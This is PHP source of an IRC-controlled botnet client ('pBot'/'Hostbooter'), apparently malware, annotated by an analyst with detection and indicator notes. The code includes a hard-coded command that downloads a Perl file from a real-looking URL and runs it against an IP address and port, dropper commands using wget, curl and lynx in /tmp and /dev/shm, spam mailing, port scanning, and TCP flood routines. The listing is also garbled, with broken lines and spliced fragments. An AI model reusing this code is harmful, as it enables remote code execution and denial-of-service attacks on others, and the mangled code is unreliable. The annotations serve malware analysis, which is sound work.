/****************************************************/
/* pbel - by s0 */
/* credits: the original author of pbot ( ? ) */
/****************************************************/
// Analyst note: this listing is PHP, not Perl, and it was damaged in extraction
// (wrapped lines, missing bodies); it does not parse as printed.
// Removes the script execution time limit (0 = no limit).
set_time_limit( 0 );
// Turns off all PHP error reporting for this script.
error_reporting( 0 );
// Writes the literal "Success!" into the HTTP response before the class is defined.
// NOTE(review): presumably a start-up marker for whoever requested the script — confirm
// against web logs; a response body of exactly this string is a cheap thing to search for.
echo "Success!";
class pBot
{
var $using_encode = true;
/*
 * is_safe(): probes whether shell commands produce output on this host.
 *
 * Runs `id` and `net start` through $this->ex() (ex() is not shown in this
 * listing) and returns 0 when the `id` output matches "uid" or the `net start`
 * output matches "Windows" (eregi is case-insensitive); otherwise returns 1.
 * The naming is inverted relative to the result: 0 means command output came
 * back, 1 means it did not.
 *
 * eregi() belongs to the ereg extension, which was removed in PHP 7.0, so the
 * code as written targets older PHP runtimes.
 * For detection: `id` and `net start` launched by the web server's PHP process
 * are the two commands this probe issues.
 */
function is_safe( )
{
if( ( @eregi( "uid", $this->ex( "id" ) ) ) || ( @eregi(
"Windows", $this->ex( "net start" ) ) ) )
{
return 0;
}
return 1;
}
/*
 * get_chan(): returns the control channel name with a leading '#'.
 *
 * When $this->using_encode is true, $this->config['chan'] is base64-decoded
 * first; otherwise it is used as stored. $this->config is not defined anywhere
 * in this listing.
 * For analysis: with using_encode set, the channel (and, in start()/main(), the
 * server and key) will not appear in plain text in the file, so string searches
 * need to decode base64 candidates.
 */
function get_chan( )
{
if( $this->using_encode )
{
return '#'.base64_decode( $this->config[ 'chan' ] );
}
else
{
return '#'.$this->config[ 'chan' ];
}
}
/*
 * start(): opens the TCP connection to the IRC server and stores the socket
 * in $this->conn.
 *
 * Server and port come from $this->config; 'server' is base64-decoded first
 * when $this->using_encode is true. The connect timeout is 30 seconds. When
 * fsockopen() fails the method calls itself again immediately, with no delay
 * and no retry cap.
 *
 * NOTE(review): the listing is truncated after the ident loop — the rest of
 * the method and its closing brace are missing, and `$this->` is split across
 * two lines in both fsockopen() calls, so this block does not parse as printed.
 */
function start()
{
if( $this->using_encode )
{
if(!($this->conn = fsockopen(base64_decode($this-
>config['server']),$this->config['port'],$e,$s,30)))
{
// Connection failed: retry by recursion.
$this->start();
}
}
else
{
if(!($this->conn = fsockopen($this->config['server'],$this-
>config['port'],$e,$s,30)))
{
// Connection failed: retry by recursion.
$this->start();
}
}
// Build an ident string: configured prefix followed by config['maxrand'] random digits.
// How $ident is used is not visible (the remainder of the method is missing).
$ident = $this->config['prefix'];
$alph = range("0","9");
for( $i=0; $i < $this->config['maxrand']; $i++ )
{
$ident .= $alph[rand(0,9)];
}
/*
 * main(): read loop for the IRC connection in $this->conn.
 *
 * Each iteration reads one line (at most 511 bytes), trims it and splits it on
 * spaces into $cmd. The loop answers server PINGs, performs the post-registration
 * steps on numeric 001, picks a new nick on numeric 433, and then parses and
 * dispatches chat commands.
 *
 * NOTE(review): this method is incomplete as printed — several closing braces
 * and whole branches are missing, and tokens are split across wrapped lines.
 */
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
// Keep-alive: echo the server's PING token back as PONG.
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
// Numeric 001 (welcome): the connection is registered, so set modes and join.
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this-
>config['modes']);
if( $this->using_encode )
{
// Join the control channel with the base64-decoded key and announce.
// The announcement text below is a fixed string and can serve as a
// network/IRC-log indicator.
$this->join($this->get_chan( ),
base64_decode($this->config['key']));
$this->privmsg($this->get_chan( ),"Hostbooter
v2 Online!");
// Rebuilds the URL of the HTTP request that started this script.
// NOTE(review): the same host + URI in the web access log should point at
// the request that launched the bot — confirm against logs.
$server_name = $_SERVER['SERVER_NAME'];
$req_uri =
$_SERVER['REQUEST_URI'];
$vuln = "http://".$server_name.$req_uri;
// Records the PHP safe_mode setting and the host's uname string.
// Where $vuln, $safemode and $uname are sent is not visible in this listing.
if (@ini_get("safe_mode") or
strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
}
// NOTE(review): the non-encoded branch and the brace closing the 001 block
// appear to be missing here.
// Numeric 433 (nickname in use): pick another nick.
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
// Only process a line that differs from the previous one; $old_buf is assigned
// near the end of the loop (`$old_buf = $this->buf;`).
if($this->buf != $old_buf)
{
$mcmd = array();
// $msg is the text after the first " :" of the line; $msgcmd is its words.
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
// $cmd[0] is expected to be the sender prefix ":nick!user@host".
// $nick ends up as the nick without the leading ':', $vhost as the part after '@',
// and $host keeps the whole prefix — $host is the value passed to the auth helpers.
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
// If the message starts with this bot's nick, drop that word so $mcmd[0] is the command.
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
// QUIT and PART: a sender that leaves loses its authenticated state.
// is_authed() and remove_auth() are not shown in this listing.
case "QUIT":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
case "PART":
{
if( $this->is_authed( $host ) )
{
$this->remove_auth( $host );
}
}
break;
// PRIVMSG: only messages whose first word starts with config['cprefix'] are commands.
case "PRIVMSG":
if( ( substr($mcmd[0],0,1) ==
$this->config[ 'cprefix' ] ) )
{
// Senders that are not yet authenticated can only use "login".
if( $this->is_authed( $host )
== false )
{
switch( substr( $mcmd[
0 ], 1 ) )
{
// login <password>: hands nick, password and sender prefix to auth_host().
// auth_host() and is_authed() are not shown, so how the password is checked
// cannot be told from this listing.
// On success the bot announces the login and posts the result of exec('uptime')
// to the channel; on failure it posts a warning naming the nick. Both
// announcement strings are fixed text usable as IRC-log indicators.
case "login":
{
$this-
>auth_host( $nick, $mcmd[ 1 ], $host );
if( $this-
>is_authed( $host ) )
{
$this-
>privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] ".$nick." logged in!\3]");
$this-
>privmsg( $this->get_chan( ), exec('uptime'));
}
else
{
$this-
>privmsg( $this->get_chan( ), "[\3" . "4[\2Warning!\2] Incorrect Login from
".$nick."!\3]");
}
break;
}
}
}
// Authenticated senders: dispatch on the word after the command prefix.
// Every argument used below ($mcmd[1] and up) is taken verbatim from the chat message.
else
{
switch(substr($mcmd[0],1))
{
// "exec": as printed, this arm only posts a fixed string containing the literal
// text "php_uname( )" and the interpolated $safemode value.
// NOTE(review): this looks like the body of a different command; the listing has
// probably lost lines here — treat the arm as incomplete.
case "exec":
{
if( !$this-
>is_safe( ) )
{
$safemode = "off";
}
$this-
>privmsg( $this->get_chan( ), "\3" . "4.php_uname( ) (SAFE: .$safemode.)\3]");
break;
}
// "safe": reports "on" unless is_safe() returns 0, in which case it reports "off".
case "safe":
{
$safemode =
"on";
if( !$this-
>is_safe( ) )
{
$safemode = "off";
}
$this-
>privmsg( $this->get_chan( ), "[\3" . "4Safe Mode is \2$safemode\2\3]");
break;
}
// "mail": sends e-mail through PHP mail() with recipient $mcmd[1], a From header
// built from $mcmd[2], subject $mcmd[3] and the message text from $mcmd[4] onward.
// $times is not assigned anywhere in the visible listing.
// NOTE(review): the original trailing comment wrapped, leaving "subject message"
// on its own line outside the comment.
// For detection: mail submitted by the web server's PHP process would be expected
// to show up in the local MTA logs — confirm on the host.
case "mail": //mail to from
subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4])
,$header,$times))
{
$this->privmsg( $this->get_chan( ),
"[\2MAIL\2]: Unable to send email.");
}
else
{
$this->privmsg( $this->get_chan( ),
"[\2MAIL\2]: Sent emails to $times people\2".$mcmd[1]."\2");
}
break;
}
// "uname": posts php_uname() (OS and host description) to the channel.
case "uname":
{
$this-
>privmsg( $this->get_chan( ), '[ uname ] '.php_uname( ) );
break;
}
// "back": hard-coded download-and-run. The exec() string changes to /tmp, fetches
// bc.txt with lwp-download and runs it with perl, passing an IP address and a port
// as arguments, then posts a "Connecting to" message.
// NOTE(review): presumably a connect-back script, judging by the command name and
// the message — the fetched file is not part of this listing.
// The URL, IP address and port inside the literal are indicators worth extracting
// for log searches; note the line wraps fall inside the string.
// There is no `break`, so control falls through into "dropperl".
case "back":
{
$this-
>privmsg( $this->get_chan( ), exec('cd /tmp;lwp-download
http://www.milf2gilf.com/forums/skin_acp/IPB2_Standard/acp_skin_html/index.php/ext
reme/bc.txt;perl bc.txt 69.65.94.14 3071'));
$this-
>privmsg( $this->get_chan( ), "[\3" . "4Connecting to \2Snipa\2\3]");
}
// "dropperl": refuses when is_safe() returns non-zero. Otherwise, when $mcmd[1] is
// non-empty, it issues a series of shell commands through $this->ex() that try
// wget, curl -O, lwp-download and lynx -source in /tmp and then in /dev/shm, run
// the fetched file with perl, and delete files matching $file_type afterwards.
// $new_remote, $new_local and $file_type are not assigned anywhere in the visible
// listing (the lines deriving them from $perl_file appear to be missing).
// For detection: the web server account spawning wget/curl/lwp-download/lynx
// followed by perl, with /tmp or /dev/shm as working directory, matches this arm.
case "dropperl":
{
if( $this-
>is_safe( ) )
{
$this-
>privmsg( $this->get_chan( ), '[ dropperl ] Safe mode is ON' );
break;
}
$perl_file =
$mcmd[1];
if( !empty(
$perl_file ) )
{
$this-
>ex('cd /tmp;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /tmp;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /tmp;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /tmp;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /dev/shm;wget '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /dev/shm;curl -O '.$new_remote.$new_local.';perl '.$new_local.';rm -rf
*'.$file_type.'*');
$this-
>ex('cd /dev/shm;lwp-download '.$new_remote.$new_local.';perl '.$new_local.';rm
-rf *'.$file_type.'*');
$this-
>ex('cd /dev/shm;lynx -source '.$new_remote.$new_local.';perl '.$new_local.';rm
-rf *'.$file_type.'*');
$this-
>ex('cd /tmp;rm -rf *'.$file_type.'**');
$this-
>ex('cd /dev/shm;rm -rf *'.$file_type.'**');
$this-
>privmsg( $this->get_chan( ), '[ execrfi ] Executed file
'.$new_remote.$new_local );
break;
}
$this-
>privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$perl_file );
break;
}
// "ip": posts the web server's own address ($_SERVER['SERVER_ADDR']).
case "ip":
{
$this-
>privmsg( $this->get_chan( ), '[ ip ] '.$_SERVER['SERVER_ADDR'] );
break;
}
// "execrfi": parses $mcmd[1] as a URL and requires host, path and query parts.
// NOTE(review): the body is truncated — $fp is never opened in the visible lines,
// $out is built but not sent, and the read loop contains only `break`. As printed
// the arm always ends at the "Failure executing" message.
case "execrfi":
{
$fileUrl =
$mcmd[1];
if( !empty(
$fileUrl ) )
{
$urli
= parse_url( $fileUrl );
if( !
empty( $urli['host'] ) && !empty( $urli['path'] ) && !empty( $urli['query'] ) )
{
if( $fp )
{
$out = "GET /".$urli['path'].$urli['query']." HTTP/1.1\r\n";
$get_data = '';
while(!feof($fp))
break;
}
}
}
$this-
>privmsg( $this->get_chan( ), '[ execrfi ] Failure executing '.$fileUrl );
break;
}
// "base64": takes the text following $mcmd[1] as input; both the "encode" and the
// "decode" arm are empty in this listing.
case "base64":
{
$str_ed =
substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
switch(
$mcmd[1] )
{
case
"encode":
{
break;
}
case
"decode":
{
break;
}
}
break;
}
// "md5": posts the MD5 hex digest of the text following the command word.
case "md5":
{
$str_md5 =
substr( strstr( $msg, $mcmd[0] ), strlen( $mcmd[0] ) + 1 );
$this-
>privmsg( $this->get_chan( ), "[ md5 ] [ '".$str_md5."' -> '".md5($str_md5)."' ]
" );
break;
}
// "dns": starts by splitting $mcmd[1] on dots and checking for four numeric parts.
// NOTE(review): the condition is cut off mid-expression and the lines that follow
// (ini_restore of open_basedir, the safe-mode report, set_nick) appear to belong to
// a different command that was spliced in by the extraction. No lookup is visible.
case "dns":
{
if(isset($mcmd[1]))
{
$ip =
explode(".",$mcmd[1]);
if(count($ip)==4 &&
is_numeric($ip[0]) && is_numeric($ip[1])
ini_restore( "open_basedir" );
}
$safemode =
"on";
if( !$this-
>is_safe( ) )
{
$safemode = "off";
$this-
>set_nick();
}
$this-
>privmsg( $this->get_chan( ), '[ safe ] '.$safemode );
}
// "moveserver": takes server, port, channel and key from the message, announces
// them, sends QUIT, closes the socket and calls start() to reconnect.
// The guard is count($mcmd) > 3 although $mcmd[4] is also read.
// NOTE(review): only config['port'] is updated in the visible lines; the
// assignments for server, channel and key appear to be missing from the listing.
// For detection: the announcement posts the new server, port, channel and key in
// clear text to the current channel.
case "moveserver":
{
if( count(
$mcmd ) > 3 )
{
$server = $mcmd[1];
$port
= $mcmd[2];
$channel = $mcmd[3];
$key =
$mcmd[4];
if(
$this->using_encode )
{
$this-
>config[ 'port' ] = $port;
$this-
>privmsg( $this->get_chan( ), "[ moveserver ] ".$server." => ".$port." =>
".$channel." => ".$key );
$this-
>send( "QUIT :moveserver command from ".$nick );
fclose( $this->conn );
$this-
>start();
}
break;
}
// "whois": opens an HTTP connection to ws.arin.net port 80 with a 30-second timeout.
// NOTE(review): the request and response handling are missing; from `}else{` on,
// the lines appear to come from a different command ("upftp", per its message),
// which parses an ftp://user:password@host URL from $mcmd[1] plus a file and a
// destination, and whose connection and upload steps are also missing.
case "whois":
{
$param2 =
$mcmd[1];
if( !empty(
$param2 ) )
{
//do
it
//http://ws.arin.net/whois/?queryinput=127.0.0.1
$fp =
fsockopen( "ws.arin.net", 80, $errno, $errstr, 30 );
if(
$fp )
{
$whodata = '';
while(!feof($fp))
/*do nothing*/
}else{
//ftp://user:password@host.com
$pftp =
parse_url( $mcmd[1] );
$file =
$mcmd[2];
$dest =
$mcmd[3];
if( empty(
$pftp[ 'host' ] )
||
empty( $pftp[ 'user' ] )
||
empty( $pftp[ 'pass' ] )
||
empty( $file )
||
empty( $dest ) )
{
$this-
>privmsg( $this->get_chan( ), "[ upftp ] URL line invalid!" );
}
else
{
if(
( !$conn_id ) || ( !$login_result ) )
{
if( !$upload )
else
}
}
}
break;
}
// "joinchan": announces and joins the channel in $mcmd[1] with the key in $mcmd[2].
case "joinchan":
{
$channel =
$mcmd[1];
$key =
$mcmd[2];
$this-
>privmsg( $this->get_chan( ), "[ joinchan ] ".$channel." => ".$key );
$this->join(
$channel, $key );
break;
}
// "partchan": announces and sends PART for $mcmd[1]. There is no `break`, so
// control falls through into "wako".
case "partchan":
{
$this-
>privmsg( $this->get_chan( ), "[ partchan ] ".$mcmd[1] );
$this->send(
"PART ".$mcmd[1] );
}
// "wako": no body is visible in this listing.
case "wako":
break;
}
// "getvuln": rebuilds the URL of the request that started the script from
// SERVER_NAME and REQUEST_URI, skipping "localhost" and "127.0.0.1".
// NOTE(review): the code that reports $vuln is missing, and the lines from the bare
// `else` through the "[ download ]" message appear to belong to a different command
// ("download") spliced in by the extraction.
case "getvuln":
{
$server_name
= $_SERVER['SERVER_NAME'];
$req_uri =
$_SERVER['REQUEST_URI'];
if(
$server_name != "localhost" && $server_name != "127.0.0.1" )
{
if(
strlen( $server_name ) && strlen( $req_uri ) )
{
$vuln = "http://".$server_name.$req_uri;
else
}
fclose( $fp );
}
}
else
{
$this-
>privmsg( $this->get_chan( ), "[ download ] Invalid Parameters, idiot!" );
}
break;
}
// "pmsg": relays the text following $mcmd[1] to the nick or channel in $mcmd[1],
// after echoing it to the control channel.
case "pmsg":
{
$person =
$mcmd[1];
$text =
substr( strstr( $msg, $mcmd[1] ), strlen( $mcmd[1] ) + 1 );
$this-
>privmsg( $this->get_chan( ), "[ pmsg ] ".$person." => ".$text );
$this-
>privmsg( $person, $text );
break;
}
// "pscan": calls scanport() (not shown in this listing) for every port from
// $beginport up to, but not including, $endport on $host, and posts the ports for
// which it returned true.
// For detection: sequential outbound connection attempts from the web server to
// one host across a port range match this arm — confirm against scanport().
case "pscan":
{
$host =
$mcmd[1];
$beginport =
$mcmd[2];
$endport =
$mcmd[3];
$open_ports
= "Open Port List for ".$host.": ";
for($i =
$beginport; $i < $endport; $i++)
{
if(
$this->scanport( $host, $i ) )
{
$open_ports .= "|".$i;
}
}
$this-
>privmsg( $this->get_chan( ), $open_ports );
break;
}
// "software": posts the web server banner ($_SERVER['SERVER_SOFTWARE']).
case "software":
{
$this-
>privmsg( $this->get_chan( ), $_SERVER[ 'SERVER_SOFTWARE' ] );
break;
}
// "snf": stores $mcmd[1] as config['nickform'] and confirms it.
case "snf":
{
$this-
>config[ 'nickform' ] = $mcmd[ 1 ];
$this-
>privmsg( $this->get_chan( ), "Nickname format set to [ ".$mcmd[ 1 ]." ]" );
break;
}
// "randnick": picks a new nick through set_nick().
case "randnick":
{
$this-
>set_nick();
break;
}
// "logout": drops the sender's authenticated state and says goodbye.
case "logout":
{
$this-
>remove_auth( $host );
$this-
>privmsg( $this->get_chan( ), "[\3" . "4[\2Auth\2] Goodbye, ".$nick.".\3]");
break;
}
// "urlbomb", "udpflood", "tcpflood": hand the message arguments straight to the
// method of the same name. Only the argument count is checked (and not at all for
// "urlbomb"); the values themselves are not validated.
// urlbomb() and udpflood() are not shown in this listing.
case "urlbomb":
{
$this-
>urlbomb( $mcmd[ 1 ], $mcmd[ 2 ], $mcmd[ 3 ] );
break;
}
case "udpflood":
{
if( count( $mcmd ) >
3 )
{
$this-
>udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
}
case "tcpflood":
{
if( count( $mcmd ) >
5 )
{
$this-
>tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
}
break;
}
}
}
// Remember this line so the next iteration can skip an identical one.
$old_buf = $this->buf;
}
// The read loop ended (feof on the socket): reconnect through start().
$this->start();
}
// NOTE(review): orphaned tail of a method whose beginning is missing from this
// listing (nothing visible defines $mode, $fp or $success). As printed it waits
// for end-of-stream on $fp when $mode is non-zero, closes $fp and increments a
// $success counter. Which method it belongs to cannot be told from here.
if( $mode != 0 )
{
while(!feof($fp)){/*do nothing*/}
}
fclose( $fp );
$success++;
}
}
/*
 * tcpflood(): sends the same random payload to $host:$port over $packets
 * separate TCP connections.
 *
 * $packetsize bytes are generated once up front. Each iteration opens a new
 * connection with a 5-second timeout, writes the payload, closes the socket and
 * sleeps $delay seconds. A failed connect posts the error to the channel and
 * returns 0; otherwise start and finish messages are posted and nothing is
 * returned. All five arguments arrive unvalidated from the chat command.
 *
 * For detection: many short-lived outbound TCP connections from the web server
 * to a single host:port, each carrying an identical payload of fixed size,
 * match this method; the start/finish strings are fixed text in IRC traffic.
 */
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg( $this->get_chan( ),"[\2TcpFlood Started!\2]");
// Build the payload once; it is reused for every connection.
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg( $this->get_chan( ),"[\2TcpFlood\2]:
Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg( $this->get_chan( ),"[\2TcpFlood Finished!\2]:
Config - $packets for $host:$port.");
}
/*
 * send(): writes one raw IRC line to the server socket in $this->conn,
 * appending CRLF. $msg is written as given; the fwrite() result is not checked.
 */
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
/*
 * join(): sends "JOIN <chan> <key>" through send(). $key defaults to NULL, in
 * which case the line ends with a trailing space after the channel name.
 */
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
/*
 * privmsg(): sends "PRIVMSG <to> :<msg>" through send(). This is the path by
 * which every status line and command result in this listing reaches the channel.
 */
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
/*
 * notice(): sends "NOTICE <to> :<msg>" through send(). No caller is visible in
 * this listing.
 */
function notice($to,$msg)
{
$this->send("NOTICE $to :$msg");
}
/*
 * set_nick(): builds the pieces of a nickname from host properties.
 *
 * The prefix starts as "[C]" and, when SERVER_SOFTWARE is set, becomes
 * "[UnixX]" (contains "apache"), "[I]" ("iis"), "[X]" ("xitami") or "[U]"
 * (anything else). "[S]" is appended when is_safe() returns 0. A string of
 * config['maxrand'] random digits is generated after that.
 *
 * NOTE(review): the method is truncated after the digit loop — the lines that
 * combine prefix and digits and send the NICK command are missing. The code from
 * `if(count($fileext))` to the end appears to be the tail of a different,
 * URL-splitting helper ($fileext and $URLpcs are not defined in the visible lines).
 * For detection: nicks starting with one of the bracketed prefixes above,
 * presumably followed by digits, are what this method would produce — confirm
 * against captured IRC traffic, since config['nickform'] may change the layout.
 */
function set_nick()
{
$prefix = "[C]";
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE' ] ),
"apache" ) )
$prefix = "[UnixX]";
elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE'
] ), "iis" ) )
$prefix = "[I]";
elseif( strstr( strtolower( $_SERVER[ 'SERVER_SOFTWARE'
] ), "xitami" ) )
$prefix = "[X]";
else
$prefix = "[U]";
}
if( !$this->is_safe( ) )
{
$prefix .= "[S]";
}
$random_number = "";
for( $i = 0; $i < $this->config[ 'maxrand' ]; $i++ )
{
$random_number .= mt_rand( 0, 9 );
}
if(count($fileext))
{
$URLpcs['file_ext'] = $fileext[ count( $fileext ) - 1 ];
}
return ($URLpcs);
}
}
?>